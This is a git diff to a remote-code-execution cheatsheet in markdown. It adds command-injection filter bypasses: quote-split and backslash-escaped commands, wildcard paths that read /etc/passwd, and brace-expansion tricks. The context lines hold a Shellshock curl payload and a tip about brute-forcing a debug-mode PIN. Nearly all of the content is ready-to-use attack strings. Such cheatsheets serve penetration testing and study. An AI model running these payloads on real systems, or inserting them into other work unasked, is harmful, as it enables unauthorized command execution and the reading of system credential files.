diff --git a/cheatsheets/rce.md b/cheatsheets/rce.md index 66d39cf..7ddfc73 100644 --- a/cheatsheets/rce.md +++ b/cheatsheets/rce.md @@ -10,6 +10,27 @@ strŅ–ng If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`. +**Basic Bypasses** + +``` +i'''d +i"""d +``` + +``` +\l\s -l\a\h +``` + +``` +cat /e?c/p?ss?? +cat /e??/??ss* +``` + +``` +{ls,} +{ls,-a} +``` + **Shellshock Bug** ```bash @@ -18,4 +39,4 @@ If the target is running their application in debug mode you might be able to ru ```zsh curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ -``` \ No newline at end of file +```